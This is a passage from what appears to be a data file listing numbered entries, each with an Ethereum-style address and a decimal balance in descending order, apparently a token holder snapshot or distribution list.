(620, '0x7f8bb19e5f3f6b8592d099ea9c427bda1bab28b9', 431.84446843),
(621, '0xdfa29ffedcab200b445d18f15a7694a6da85c4b4', 430.318456),
(622, '0x63967b662d097be2ffe0eab61d55ee4b32a69fa4', 429.0),
(623, '0x0f2f9599c19cddd869d0bbf7bc3bfe354dd5b40a', 427.85973527),
(624, '0x5c6080cd34ef4e2742f91b26c851cadae2cf1e05', 425.96496867),
(625, '0x37dcea34f00510ec3992fea2ecb5ead014363db8', 424.20519729),
(626, '0x1fdbf4956a48b525789bfd73a1cba03761192d8c', 423.22540155),
(627, '0x5a5796f45049cb30d35491b0c3183e8a99f12f11', 422.0),
(628, '0xb2371c0c12d79d787311240ff75d864d88b3cab1', 420.20786933),
(629, '0x2079620fbee71576f351cd537433ace87755d25e', 419.96655929),
(630, '0xaaabc6bbe56b5a4f8d1d262a80336ccfd2c35609', 419.03573976),
(631, '0x0423baa1169b4cbdc1e8d784713087954236904e', 414.74566362),
(632, '0x99bcfb26297cdc94411306844d7ca0c18e8317ac', 410.25527082),
(633, '0x29062e6f54c50dddb35d6500ede871852e604457', 409.74195751),
(634, '0x167de00e1b881bc7e26bef7ce5f62dc4b8df209b', 407.56910265),
(635, '0x01c0d535941adf96f90c81546241bc79e7c0f0e4', 407.30784126),
(636, '0x934ba340a1ef0c0f4375afd0bf9a9f90e0afb6a8', 406.69465349),
(637, '0x02c8832baf93380562b0c8ce18e2f709d6514c60', 405.0),
(638, '0x63f2b59051c281291eee4cbbdd32932d8d4fb2f2', 402.12674774),
(639, '0xd4734fde02d9afb4ac66c4daaa4b6b8327a8ded8', 401.0),
(640, '0x23347e15495cbfb542c197393d1fc59680fd80df', 400.2588443),
(641, '0x371c748e0b3eacadf7bf96c67b7bc9ce26de5367', 400.0),
(642, '0xc56e275d1c924b26f3a5b45cd4de2f94efa9fc91', 400.0),
(643, '0x9cf7d9b3351e3d572eb13f87256d65d932a565e9', 400.0),
(644, '0x33460cf7bd35ad0b8a1fe7e6563c1a245380b988', 400.0),
(645, '0x5536464f90a3846c832fa3a2ee9dcfe8895b15d5', 400.0),
(646, '0x1aa9e47e2a99ed5ac0bb9b0920569c55dbb7b230', 400.0),
(647, '0xd6f6dac73b89852f89573903d3867fc7b4936da3', 400.0),
(648, '0x1c8e1085b6903893b88bdd28d569c26780f7862b', 398.2933557),
(649, '0x1b22136d1dde8644719fa4da2fc93d60b2e05ff4', 397.71649608),
(650, '0x32865f7e3e913a2a5ee22b94900f6ac0c75a061d', 392.96027116),
(651, '0x66a39c5f5784100e95e7c75529cbfa33ef2cfbbd', 392.45061359),
(652, '0x57addbcd0953ff2845537fb4b50fb6337d533964', 387.08658262),
(653, '0xab6c998b11c8d886f795c38e0be1ad435e95cd83', 387.06879039),
(654, '0x21a954eba84e9865fa812133e881afb912ef984d', 385.69661258),
(655, '0xe75d29fca129556fcd3840c843980708bc411424', 383.80743965),
(656, '0x6a6ddfc37e5a29424347e953a5b0d5a379c9b237', 382.0),
(657, '0x03736ca98431c0304386d865767b61db3cee0a96', 379.90788963),
(658, '0x23ed325b8d26fbf94410eff31cb5ef7b95972c56', 379.89771081),
(659, '0x3a4dd62195f4dcc3d3c2517f2bc699594fe2cbb9', 378.34599999),
(660, '0x1cfa8a9b320f4fcc22f3504b7d0cc8098f3857a0', 376.9055103),
(661, '0xb0a22717f63644af3c532581bc386faaf60ad8ce', 375.78959858),
(662, '0xed7b96343ed0da8b1d239afe7c4668a70bca2577', 374.44693629),
(663, '0x1a1e55d9272f77e1ebbde9a0d260b7d220ca18f3', 369.6287616),
(664, '0xedf7e493251d6c78115277698e982480b0e1773b', 368.78994759),
(665, '0xabac0fc70e5cbf775d12a5abcf4bf705995b18da', 368.25965517),
(666, '0xefdbb186cb14a090fb9136c7a6400282356e5e22', 366.92065839),
(667, '0x77a3b6102a8f3b1e7aff475a8ea9a856cd7fdabc', 363.79688322),
(668, '0x7f2085a1ece8f74f10adca07cfc936c6a96a0427', 363.59984159),
(669, '0x193ec3dfb0a06db9f02cfdcf301b2c33de31dfff', 363.37521847),
(670, '0x6aa808170712086aec8aa9b39ac80ed0cc55e221', 362.93106255),
(671, '0xb7715b04fa53cff24ba12400be2b7843774f32f6', 362.88895187),
(672, '0x5c9f3794f4308ea8227faed5c3ac5908fa9884e1', 362.50141307),
(673, '0xa1ddd40c4fce771408a4fc0590209cbb3f006f55', 362.0),
(674, '0x92bb7ef350243cbca627ba7076453a5effc2a202', 359.6748983),
(675, '0x4944492e2fb7bf93601b22ea59c49ebd6d185faa', 358.21363892),
(676, '0x5b8807549930b94cf13fe22746f51e2813380987', 358.06720409),
(677, '0xd71e7670ebed1e3ea1536b12d1e6d319da5d6fd9', 356.7627899),
(678, '0x8da1a4d25691d9ffa62b07c5675d4839356cbeb0', 354.7313845),
(679, '0x3183ef2ad7f0a3b5f7dc7c350f4058667d6be781', 351.8619),
(680, '0xa032f572274fb4f3ca2df8dbf5dac279835f2d7b', 351.73274004),
(681, '0xd1f075cd82f8120a47a482f248b0d8254ddd9b2e', 350.3669923),
(682, '0x45bb49591265085eb80c3d03d9281a3be11b355c', 350.30069381),
(683, '0x57efa1eebe1acedc0dd10e6335d829b7c144072a', 350.0),
(684, '0x4fd8511aaea3913f16bcf639cef7988c37ef707a', 350.0),
(685, '0x76625bb609f965f4e0f223431c7e60d9e1fd1013', 350.0),
(686, '0x109c7c68c1f10330bb5f50035f3777eee1fc3cb3', 350.0),
(687, '0x9818fe60a00bcbd56e9aee5cef96c94e329e6dac', 350.0),
(688, '0x2b50d6b35f71ca118c997ed89dfdf96de8437fc6', 350.0),
(689, '0x22667fb14c52d6d781be9884296fb2345abb0697', 349.01673318),
(690, '0x3018f598fcc8aa5acc17c1f133e4679dfcd8274a', 348.0),
(691, '0x8b86b5ecc5c07b609b2a6826612712a43b05423f', 346.5),
(692, '0x2229dbdc40331356f711e9e15385c9f98562a7e7', 346.0),
(693, '0x8f6955595b24b4e530860baea1a92a15cc226aab', 344.43422237),
(694, '0x536ef3c96793af3e1de165994a013ec319c1a72a', 342.90754915),
(695, '0xe7565a6b56bdb796734b54d401463b3d0eae31bb', 342.87),
(696, '0x2bc4a0eaa560236176f85c7a57ac1e7c9b0846f5', 341.08837597),
(697, '0x554e7ee670233f92106137458d5385f4369702a3', 338.85020103),
(698, '0x3590b2919213fb1a09869ceccc481c77a158c9d6', 338.75368584),
(699, '0x90501a884d91e75741625d129df767179931c7be', 338.10807494),
(700, '0x36e5b46b85de9cb2c4fa8d5e0bcb72c3b7cbb76b', 335.77813453),
(701, '0x68d4163c55ddcf49e7b1583d69a2c072cbe560bd', 335.5094125),
(702, '0xaf5bbbe97968b0412715f8ce80c66405677b2be8', 335.09544557),
(703, '0x1993ef941b84f3fcb64b99c857850de9c431e98e', 334.60051252),
(704, '0x9a19cfe15ee6efb5ae9b1d033bf8a36bf99a2df3', 333.34842189),
(705, '0x7dcdb021103a8ef31649044b85619313291b2341', 332.32703544),
(706, '0x371e31169df00563eafab334c738e66dd0476a8f', 331.98857512),
(707, '0x658ecf11ae34bd40fa0527e08d56f346fb655b82', 331.11462132),
(708, '0x87bfe6289b68c6f3d816c438d652c0ea22e87e32', 330.79954986),
(709, '0x3a05a1f13c032694a98135aae4fbffb414a94e33', 329.8141846),
(710, '0x5f607978c76ba75512faaebc56e2e1cede49ff8c', 329.61174953),
(711, '0xcfb87a694c5636429a940ec7433827c83083b269', 329.5612559),
(712, '0xf99c27f2a8ecca6ce73e55a932212455c25ca397', 328.99995803),
(713, '0xf3975394c9509c47917fc25672d2cbdec2f52ea0', 327.87),
(714, '0xe99539d93aca3430b28f31ded4f67437e735e239', 327.28706604),
(715, '0x7e198c3fa520051a68dac97fa94a4221ddac11df', 327.04364102),
(716, '0xccb6098ec527d64617b11c924e6c1fc6467bd1e3', 326.0),
(717, '0xe6157479a2c70e936e54970c61aba50f8c7f09c9', 325.72355963),
(718, '0xcf646051a9f1215dd67f31ad6802a90429bfbdb5', 324.32372021),
(719, '0x003c40ae6be2891d14ed6e19dc1d47bb9462b8d0', 324.0),
(720, '0x2ead1ddaed62f6f36e5f45d4be5b154c9806ea16', 322.40686188),
(721, '0x3cc01bd3fa028bb1f23ead376aaceff53235b3ca', 321.03723993),
(722, '0xa5f4c2207e36e9918f8da433dd0e263b2a6b9d8e', 321.01138171),
(723, '0xaaade1a54cc2765b5905c3f72de18ea6f5d7873f', 320.755555),
(724, '0x67504da78d3c1c7e8d5e7b792c1dbf112a0c6d10', 320.38037697),
(725, '0x55871a59c1635189e91d1e80888c1c578abfca27', 320.21008125),
(726, '0x73196b340a9fa2693d50f8205a5116436ded0c3c', 320.17027905),
(727, '0xa9d4a7d5db31d9e7ca5bb1f41c1d324785b05488', 320.11790285),
(728, '0x6f6559a644f528474ed929a38d94b9cba9654443', 320.0),
(729, '0x8818abe27fe49a47cae82193d84b97e403a47e8c', 318.28708169),
(730, '0x2651aa54f3d5df572dcae2dabf6a49e2e56f4103', 317.34444876),
(731, '0x51e9f8984e2158170212974d930b6256f699a5d3', 315.50902925),
(732, '0x10cc7f90ee99ad2bafb7c74da88d0257cd9bd681', 314.28334651),
(733, '0xec26db2c6e4497cadf41bbfe4f30cd2b4ad877cd', 313.36868276),
(734, '0x67b86ad5e3a07ffded683803da2270676a0bd35a', 312.94549929),
(735, '0x36f9b46fb3db82ba3aadad40832b24fabdf436e3', 312.02343706),
(736, '0xb2d5b8fffbd5a1966dfb7525dbbef7698029f7a7', 311.85684169),
(737, '0xb9b13fc0a1333c8432e9ffa0ebde184966321a3d', 310.8810481),
(738, '0xace766022a1b6d791056cbc089e23577812bc50b', 310.0477478),
(739, '0x2eca99f05547eb5865822a93122a8f71454385e1', 309.30289666),
(740, '0x3b783753acdd152a99404f31272052bc92c28510', 309.06248323),
(741, '0x8a84d0b0c1d5f36b6f3c7ae5a583b74247b7e0c1', 309.05875882),
(742, '0x2cf674dca312cc2f906b9376f0d720e5d030d464', 308.0),
(743, '0xd3107b09a9edc1c98f626b0f9077c6dcd2ba89bd', 307.908),
(744, '0xc7d2e623dcb6c71fa05060cd5dfb72d96465f228', 307.63157854),
(745, '0x9260092ce752c43ad96cd5ff21eada514a23f4a0', 306.75186035),
(746, '0xefdfa03ae571da4316e1166d8897a4299572b315', 306.66810993),
(747, '0x445a4ed48baddabae2ab6a5790efd020a4279115', 306.16484689),
(748, '0x1ce6f2ed6e3faedb0e8721206da2e5b370f460e0', 305.97211648),
(749, '0xf5f749ff9f7c69a89b80d6d0217b011e79faf7b0', 303.64079138),
(750, '0x4d01d11697f00097064d7e05114ecd3843e82867', 303.63337447),
(751, '0x1f3fa52a2a5b8145b075e3d48a546be904481d91', 303.57466553),
(752, '0xbe500cf03b31d956d2ab5e775c91c18d6e53418f', 303.29049714),
(753, '0x7392f1e82a44bfdaa79531023a6230e6f0fdaeeb', 302.31906298),
(754, '0x9c04bca50dcfa49b25490d969961bfc081f9552f', 300.76859035),
(755, '0xf4c61dab2461d2465aded3ead28f0c390de10843', 300.66689267),
(756, '0x710e5b9da20ea663f8b179a3bf38c2322ab82604', 300.0),
(757, '0x30d079969bd2f8ff8530a8bff576bf469f8646ca', 300.0),
(758, '0x2a20625e96deeab449bb89979c6ba7801dc0ed9e', 300.0),
(759, '0x2e2180cef28ba03ed896d18701c721ba70362a0a', 300.0),
(760, '0x7057a22fd7a5c4e3a9e9b1516851e99f099e35b1', 300.0),
(761, '0xc922de5385d2f08218cef5b686ba8d790d718010', 300.0),
(762, '0x6c7a3c832e573b1d7f3c9f7d51b2ec13f461dbe1', 300.0),
(763, '0x728325a626ef65b5ecff44310c6808b3736c686c', 300.0),
(764, '0x494cf2c35f752ea1e0b8e5e4f1a04698ff8b1338', 300.0),
(765, '0x709ff6949b63d24b8fa44d8ec6d32302dfca4d23', 300.0),
(766, '0xBcC4628a0B71C4dD69D8f7829cB79E42F8a4BCDe', 300.0),
(767, '0x3760ef16041619f0ec3891632e4ae79218981f62', 300.0),
(768, '0x7744444bad94d7db8b185e41d0a6b8fdc675fe47', 299.55959304),
(769, '0xa64919ee4501b74ebe1ed955dec5200699055ade', 298.97674942),
(770, '0xd325e5e246236cd1c767a91168f96a08fc020031', 298.845625),
(771, '0x35d7bc62e2fda111893a8b7fc8395eb957a65638', 298.0),
(772, '0x7d53da4431c1dfe656635d844e0db44ec901c1a2', 295.74041708),
(773, '0x52d4dd31b1c314c1f59ace974f34a81f7f75b86c', 295.39721518),
(774, '0x70c40c4528826a6181ed7a7306b37e972d0a389b', 295.31283653),
(775, '0xc7c12e35f6f10863d51e541dd143a9f6a6c8cbc8', 295.0099691),
(776, '0x7c512e289935fbbb416bf1e2fc09ae80dc44634b', 294.3317),
(777, '0xbc6cbbf40b0609f8340cc29e1438b7c84e6a4837', 293.20737932),
(778, '0x76e5f1e5aede232ee237f057da846b5d51426c56', 291.7963052),
(779, '0x3df124e8d621f4d165d31f8eb8f4e718b2193a95', 291.41975275),
(780, '0xc312c8ea8fb8b2d3f5d3bc8334062cc200882f78', 290.09372407),
(781, '0x8fb9099238dbfd7a884fb2b6ee70e6b3593a8d0e', 289.38926647),
(782, '0xb03ae8cf677662b458b6bc28edb1c10fe758f2de', 289.0),
(783, '0x2db3ec7516bc77059344df4c7fbe923a0ea13084', 287.72556154),
(784, '0x2e509ba9089ebe71793bc53544b982b59e1f23c3', 287.40148617),
(785, '0xf93bbf0ced03cb8758b512d4dde331073ad3009d', 287.22375604),
(786, '0x33669f15ed78bbbb9e6bb7edd5049e068d14afba', 285.22063294),
(787, '0x15c398709007c28ce0258363d2b52db140bd59c0', 284.91768291),
(788, '0x08cdc5f71372f6310880de60ad9583cf659d4d4e', 283.40636702),
(789, '0xbc69705d0f70727c59dc7c5813bf310e4ee4df2e', 283.1460731),
(790, '0x550d1dc4d947195fdfe54a949fe2d2a90a22e944', 281.19519419),
(791, '0x70cd6ffca694ee8136ebe2b610daecf9fe6019ad', 279.85418564),
(792, '0x96b5b7cbeb1d04eea03ed8b03bed0f6dd352c571', 279.62666658),
(793, '0xc1b46bb724a3b4f777eb6f649a03da2a53e7e249', 277.37899308),
(794, '0xbc80e5d89fb7ddc17c712c73b9efdb51bfcde3ca', 277.01464732),
(795, '0x5670f282ffad01f2bb630e732f47ab6def954209', 276.56815898),
(796, '0x5823b8cc89801a09c45e0d06f73a93052aaeecbb', 276.35017299),
(797, '0xd84f96ca233e44c1fcf3fde888bb0b3b080c00cc', 276.03893107),
(798, '0xc49fb9b118408e91a1c5b7e05820484402375f6d', 273.89740926),
(799, '0x2fe8283062fc30cb0bed18408ace49d8adccdfa7', 273.7991923),
(800, '0x7734c9644bfbf38bde0cddb2bdffb60b2eec04e7', 272.53411013),
(801, '0x111e68eea84579ed4a8c95cd1770f314a6cab950', 272.0180342),
(802, '0x6d2242fd00af0f767f53422d22d09286403ea017', 270.93956265),
(803, '0xe57a18783640c9fa3c5e8e4d4b4443e2024a7ff9', 268.46005552),
(804, '0x7021ae2aeae78392f98f7365c2e5770adc1c46a1', 268.4477532),
(805, '0x45c0a8f62ddfdbe2dc5a9921549783d9e0c32ef9', 266.01201613),
(806, '0x7cF88c57E7e03b4a423C52434A63c4CED771346B', 265.54320081),
(807, '0x0a674a97b5e66dd09b8a333d0bd1f45405731fcf', 265.28357862),
(808, '0x3ca4d035f80d9ac12a675d7b7dc8b399cd4a61c3', 264.64540184),
(809, '0x23d534b3296908b122c60b9db298e58ecd1b0f09', 264.22735755),
(810, '0xacf6876f317b78f6913c98e512de3e1572b34120', 263.85938396),
(811, '0xf3d1875c8b7d1bd409f096de4edb405d47270689', 263.0770529),
(812, '0xcc756e62461093382ad0aca60cb2f1bc9a52bb97', 263.05284221),
(813, '0x002b2765ae2e03f9f6da2cd2af5ed3ee329c1356', 263.0),
(814, '0x4eb5015d4cb7b4905324739111a3c8c53917dbc3', 262.94729147),
(815, '0xa2bf4413f0f4a61707142b9edd60fae229c48456', 262.91106882),
(816, '0x16db85231fe5fa48b63b2aed0c901deca25e2611', 262.42702953),
(817, '0xdbcf13c243060ebfb674da507d60c5daf553ba54', 261.42864721),
(818, '0x770e4ca3051f265e4ddacb482de877aa76730717', 261.0),
(819, '0xb39aa81403def2c32e088ac103bf52b9a8422ba3', 259.90825628),
(820, '0x33c1aada397f79cfae5b23c43ec46420c91c418d', 259.64663781),
(821, '0x8c31e53563d9f5c1d74541232d5f85ee4d5948a3', 259.6079708),
(822, '0xdd93cfb9abb42f21f8c6d9e9bef2c4f94d7c898a', 259.21554147),
(823, '0xf1ff7d26951d1fef8d59d754efb083d1305b05f0', 258.7967909),
(824, '0xc45fc6db6af5ddec98cc3e16b6d941ac9fb2d0e2', 256.7780919),
(825, '0x4f61ed67b141eccbc24df163e5deb8140e7b7600', 256.08582357),
(826, '0x9b15f2aab275c05ac58c49804247c663522ed7af', 255.7386441),
(827, '0x245b050415166348c2b825792b7b58c5c87e789a', 253.71547808),
(828, '0x2575588a922d8f611a6151dd1b332a1badc47f1c', 253.66455593),
(829, '0x35ea3291a3ea6eaeaaceb1d2f55177211fe3a27b', 253.57168199),
(830, '0x696883cea7a9ce83a4a276a8f3447dfacc65f466', 253.43440225),
(831, '0x263c2192b5b5f2f4b9f54c7561dc94f62b02317c', 252.65705132),
(832, '0x71fccfa917bb4e1abed5b4b3583654853dea1314', 252.1714818),
(833, '0x688008d2d8ae40311a79f568b18f017b0dc41c47', 250.75211525),
(834, '0xbdf985751c613fce4d241991156cb620d671c3ed', 250.65694903),
(835, '0x7fa344092bcca779841161ee041c3bdd3b577326', 250.53242136),
(836, '0x1b04fae81f45711d3b9b60927228940e6d87e343', 250.518336),
(837, '0xdc0f4fbf2b17dc2d70f02fbcdbb307379d377c7d', 250.0),
(838, '0x6e54343f00759f70c22f25cefb489afe072f9366', 250.0),
(839, '0x5ceaf18e7736bc532ba1253fe232c54ace53f243', 250.0),
(840, '0xa5ff04a8470824ded263fe695607858a6f6489d5', 250.0),
(841, '0x1f6ca49f0f6c186f469ca3c9adb1aa2354c21349', 250.0),
(842, '0xc850771a21795dd2217b43e68e07b879733877af', 250.0),
(843, '0x3849f0be9065d2bea90286c5baa3fb3c452fbcda', 249.49),
(844, '0xbcb9d0a1b88d7d50872a3c078539c5b8d314c91a', 249.27975219),
(845, '0xc87bca32273fc032d317359d4a8c5101e200a5f2', 248.9413691),
(846, '0xa47317a4fb1e47db3446cf755f6c2ddef023f2da', 248.78605206),
(847, '0x5c634233f886e73356698357a0f663744e684d35', 248.74904054),
(848, '0x8e4583ddc2e3047c83a4349bea0e802c20483ddb', 247.24725949),
(849, '0x891a193143994c0e7c3848c94a1c976098627370', 246.7708703),
(850, '0x05deb29f9478fd9fe90d1502e9715c024543cc75', 245.0),
(851, '0x7ff296c8893fe90bc7777fb68507f916ec850b6f', 244.31835159),
(852, '0x7b975dcb0bb60cb7201a4e577d13b8be74f85b1a', 244.0),
(853, '0xe45d8ceef899167cd9eae296717caa15a0330093', 243.27583841),
(854, '0x5886fea558dfd941bed22c0250570f7557d0032c', 242.97679458),
(855, '0x23bfda964df4e3a810156c3180938de7b738d189', 242.53253113),
(856, '0x3410abb8a055eae945e1e48f5b4f07663cdd0821', 242.51406073),
(857, '0xf6637e95eddcd0a624459a3477c8d65d41f57ada', 241.99664073),
(858, '0x9258355010cced4b3e563e22868689aabbbdd728', 241.32270153),
(859, '0x607d6da90fbe246fd192db700726ff88555b56ac', 239.89406805),
(860, '0x4de5898734d93f72ce1003382a90e1bd511d9067', 237.91641884),
(861, '0x499acbeb70e2e52536139b2a8b2bca708f5f75e3', 237.28032601),
(862, '0x640d0d3c17a253d0b9fca05633b2b3efb9db473b', 236.90341613),
(863, '0xa231ce4ccb9daeea47d2af82a3ba290f628de6f8', 235.65849253),
(864, '0xd6ceae2756f2af0a2f825b6e3ca8a9cfb4d082e2', 234.57736574),
(865, '0x197b6b24a38664e662556594d35a8e108a34f139', 233.48768373),
(866, '0x86e346e5c52231c44cca1a07ff00254fc252f838', 232.70397227),
(867, '0x621c6bca87a6b81aa38082882d259d735cc9effe', 232.27358929),
(868, '0xcb13ac2a86986445c6104395bcee9f9f31b8324b', 231.40125181),
(869, '0xf986d16186e5a2eddc5f0d36868a1362b3f60dfd', 231.28528812),
(870, '0x934c80e3a3e9136ee3558950385b66ac5e7d9bf7', 229.61868108),
(871, '0xd4f0c99939cba33866bad85d545431b8cc746ea8', 228.93969259),
(872, '0x41c753bc90ae6cc015d9bcbac0647f9dce07dabb', 227.78130521),
(873, '0x0ac807bafd8cfbeff973bb1244c7ffa22a348b6e', 227.08288317),
(874, '0xa044c5ae34305784c9918d5e5fbea5ab3251d3aa', 226.79998164),
(875, '0xaa9bf46053f9e48085743832747f7ad50a5c58ff', 226.63431746),
(876, '0xf89e3fc305dfe636a67a13c6f790b7e62bce8828', 226.20496714),
(877, '0xb103d4b9a5fd9ca8a5ff12df0c5bca3fafe423fc', 225.45282429),
(878, '0x93da7b2830e3932d906749e67a7ce1fbf3a5366d', 224.98856875),
(879, '0x51ebe95db3c6272f2d8747d0ccd675a438d1dc12', 224.3672468),
(880, '0x22901d4fe237dd8154a502d282100f5b11cdd6fb', 223.41457311),
(881, '0xb2b00ef96e88b74e822765f0ad4d200c0ec8c99e', 223.41286558),
(882, '0x9d815a79eccccec71c7527b715143411648ac49c', 222.59749324),
(883, '0xfe7dabdafa8c46c21372b6b22260f7c96f9c56c5', 222.26848029),
(884, '0xd7053daa42729d66cf4f7921298550f95123a965', 221.9319662),
(885, '0x23fa2c9cc4f07015476f55aaf384a2678b7d29f3', 221.82741243),
(886, '0x99c0936f5e6a753820d2827f24b72f187c1106a9', 221.60595416),
(887, '0xf99c1f71aea3038bb1810469c25b6a01fb546371', 221.15441737),
(888, '0x6c9fd210f5efd839e9dcb4e09ee0d46e34dce002', 221.13915623),
(889, '0xc66b4d7f9384f35e7bd053ff427192ef877c98be', 220.86786603),
(890, '0x503e3339e388c741c8ceb2aad7a97eae45bb50f8', 220.61341751),
(891, '0xb09b35090b92363d0cf8ac189fba035d5a1453b8', 216.84507538),
(892, '0x0118ddd72f1d0a8eb42de4fbb6232aa37e0abe86', 216.78860567),
(893, '0xbce65e09c1191d995595c26c86402f06aa574309', 213.0),
(894, '0xe5cdb94682fb41e4088dcd5ee921fb75b23f2424', 212.8276674),
(895, '0x2217aab331a33279b47e811da0d799438e5da2c3', 212.37242678),
(896, '0x7d468e6b8c66d2d063d5e6ce7c3b700915821a59', 212.28133),
(897, '0x7724e403a474fb04b0580449f6fcf8cbb1c8ce1d', 211.45798442),
(898, '0x2107f780671b0a5026c3a8afef77ce16420cb639', 210.94519303),
(899, '0x2b4b2182413713869b4ff29b7bfe9be715400ce1', 210.91284422),
(900, '0x63743b09ed50edfdfb4861df82912ae060d9c7b2', 210.57426299),
(901, '0x97ae2c1ba8a514d7f2c668005a07b2666613cdfb', 210.0),
(902, '0xb322c32b6d07d5e4db4a96e0385cf8ea22eec7b4', 209.98830491),
(903, '0x9fdd25b93d56f3f408a95a6c5491021f7f81df5a', 209.75111495),
(904, '0x438bab3c37a910e2262f0b580580925f142ebe65', 207.95118658),
(905, '0xfd21c90bbee9af68bdafd973669798d15b502122', 207.56102775),
(906, '0x130f3c00d8c86a3bd97c0308c514dd4cf82790c7', 206.52814309),
(907, '0x26647cba8c8c727e46277e910303a9ec72b9890a', 206.34524689),
(908, '0x956d3fddf2b1ae4820acf0cab97d85993d3cbb30', 206.328),
(909, '0x90ec7509182ed43c59877ece2bfb4916399de648', 206.0),
(910, '0xb0cbd09e8e4c93349a7eba3e854fc732c70d29fa', 204.9370959),
(911, '0xe88d1a3ecd62b3b98172c7b4dd289410df1e1edb', 204.4163495),
(912, '0xebad0b51a67fd5078aa964ef42b176abcd4399aa', 202.63466332),
(913, '0x685ec035fc06e31952ab33008871e2eebbf8f9f5', 202.52584979),
(914, '0x713e2e915e6c56f4c18a63acdd168562f3094c05', 201.877),
(915, '0xd866c58dcea652649bab34628463f7478e525370', 200.06703557),
(916, '0x098733a634ef21ec265e82a343089355b4701750', 200.06428168),
(917, '0x07a0af3b01eb56f321732393a30d78e76d97f91e', 200.013),
(918, '0xe5510b4a1abfa1056950ca1f9f1ca8a9ec21b2a3', 200.0),
(919, '0x060e8b181ff896d7d32618df05a73fc390fe2b21', 200.0),
(920, '0x8c68c0843e11c62473a9a1d7d1f438d3abfdea8b', 200.0),
(921, '0x1c076672ef23e7d512ab9e3f38d286d869f57a9e', 200.0),
(922, '0x653855da596f237c53b2b84c1b4a182b146d293b', 200.0),
(923, '0x41877bbaac231d9b4902951823e95abe17861011', 200.0),
(924, '0xe130e14e487cc538ecc4c9830acdc2d430465cc6', 200.0),
(925, '0xc85ed90266447df9eca3bfc297b4adc4604b1daa', 200.0),
(926, '0xddfcdec21e2f63346db201560448046551d213a1', 200.0),
(927, '0x8688a84fcfd84d8f78020d0fc0b35987cc58911f', 200.0),
(928, '0xd3a23314f6210cbc4544dd4cfede22776dbb6106', 200.0),
(929, '0x87075773039e7c0ab18ac2843773d02c27f3216f', 200.0),
(930, '0xbb985902c457c623178efde482b2e08ac2f66106', 199.999999),
(931, '0xcc704b873485d9403168575ed4ef8307e8e9eb71', 199.73508499),
(932, '0x29170a4ca3b8f16aa7be54db0fb8c4bcd30b0788', 199.705),
(933, '0xc3c152b9f7b62f5bfec503642a7ee175ca81ce07', 199.53146357),
(934, '0xb48e1ccf81f9d46e8b1c90cdf39904d8afc7c2e2', 199.37300818),
(935, '0xf0fc218fd25bf4f2dc6a8f14f547598f07d720bc', 199.16829171),
(936, '0x449913dc43d70024a47a8fb8350c813fc60e9278', 199.10542388),
(937, '0xb74f7a631fe4010bf2e9ab77d6b8b68c66d41958', 198.26748818),
(938, '0x17adbb51a5b9c71bc28c18305829b18c17d32842', 198.15),
(939, '0xf5e78d6b32f020690376806674aa92635ca56092', 197.96461209),
(940, '0xf3ed7f993f17adecc5f90e2cfda35143d8e3e1ee', 196.85281744),
(941, '0xb5169e66cff142fc4f46a14ec3114be06568cb8b', 196.7109778),
(942, '0x39740327e50d724bcc2b61b7f30eccf9b27aafb9', 196.20195087),
(943, '0xcec2be5b446209c8b063fdcdb4c4c00cb8afaf42', 195.475),
(944, '0x780abe95d3d615331e1b35fad59a8838e9470002', 195.24575016),
(945, '0x820d47c953968902efa913f51f1bd1728f5ab72c', 195.12899999),
(946, '0x44f7981c0eeb4ca473f81618fc3f01c80cc57f0e', 194.18843183),
(947, '0x8b326cf10c8541bcf2cbba46e1e8112b0fc7f125', 194.05363187),
(948, '0x0ea196011005d0214630b04dae024117bb429a62', 194.02993027),
(949, '0x1d00ffffb205cc0c5a51e7c77a7668a8b90bbb90', 190.76014815),
(950, '0x3d64c731f0a0303e741d37796d38f3eb0768873a', 190.67720369),
(951, '0x298ac03fb6cd6dd37d53ca4813070bf5be5719d4', 190.12136741),
(952, '0x11e8dcab08519b56e015260d93e098e64f13a78b', 189.42195993),
(953, '0x7e3ca464db06ef577270e11e1b2d75b552099336', 188.76621809),
(954, '0x11174cb4dfe45467343a2716d76a5cd8309713ee', 188.70207649),
(955, '0x3bcc46e668d1a043b0485dc64f3460e4c37c26b3', 188.32497159),
(956, '0x565c9aa0eed9ac07d29b8d7e995df17b9ddfd149', 187.20113057),
(957, '0x78c1bba11c7521bc1da077562cb898f48f147bf0', 185.97341615),
(958, '0x2bb9cf7ae3891ebf753f30beb792550f0ebf14b1', 185.24678208),
(959, '0x40613a09b22f552aa41a47e8b6a64560a79fbfd6', 184.63057093),
(960, '0xa387aa404cdf08efe74b9ab7c517aaab5bc4c919', 184.30992759),
(961, '0x053aa1b9f6bb0de10b98b8af260b4d94eeb8b07f', 184.0),
(962, '0x1b3c4708dc734a373d5d6618d8a3f580b9eec9c6', 183.87385626),
(963, '0x5a84bc50cc4c47895dc01a76262df189989471ea', 183.55020985),
(964, '0x3f023cb4d9c93d912e37c1354ac5698c4496a0e2', 182.8169545),
(965, '0xc3f5dd9f16cacd7fdc799a2782e44217e7b456d1', 182.44702526),
(966, '0x9d56fc70d03d923ec6cdb5593021edeae48cc12b', 182.265),
(967, '0x5e14feb4a976491352284c0e3c69e7d6ae7d87f1', 181.330829),
(968, '0xa1ab7921c9fc01f443b7bb7f81dd67db5089ea18', 181.1254349),
(969, '0x8c24092bb23394f83cdd7520ff42c437e25a3c39', 181.0281608),
(970, '0xba8ad71f328c166f34a3ad43d59492cc87cc359b', 178.96271297),
(971, '0xacc6be7a640d780a91a6d1d8a9c1b701d07fed0e', 178.76940001),
(972, '0x2cfe2ecea89782df317068b5dc59b6cbfba38b76', 177.10490631),
(973, '0x3dca41eeb0f638a49f6976d34899f90149d85a35', 176.53929634),
(974, '0x786d28ff5cc2402024eeba8868fdc328d9e8e1af', 175.81733323),
(975, '0x7a47fa7b3820dfbd65ddc5d6647af225da856ce2', 175.0),
(976, '0x22ef324a534ba9aa0d060c92294fdd0fc4aca065', 174.91276511),
(977, '0x42ac579ca4324c216731c0cace0a9101a1c8411d', 174.83380574),
(978, '0xdf1d6965cd0929e2a9a7d553aaa9cfa57db76c54', 174.31822674),
(979, '0xeee1588794468afc4ac93a6f659c188bc8e28249', 173.3201683),
(980, '0x730f7f84f3d08bea0828d5d31e17fb41b4c71d85', 172.19889366),
(981, '0x1e12b94789113163f97f756ea2190c3f71dd55c5', 171.91497869),
(982, '0x31e4694c01aaf107fe7054724a91961ba93aff2b', 170.66619195),
(983, '0x0d3271dc3cb54e9e20092db0b60b07ceb1de62a4', 170.30549804),
(984, '0x31cc1f2bc8336ff2ebbd0dccff8347fb31a75260', 169.6063018),
(985, '0x38e3006f34d0425f78d67d5d043400edfe7dc040', 169.58827772),
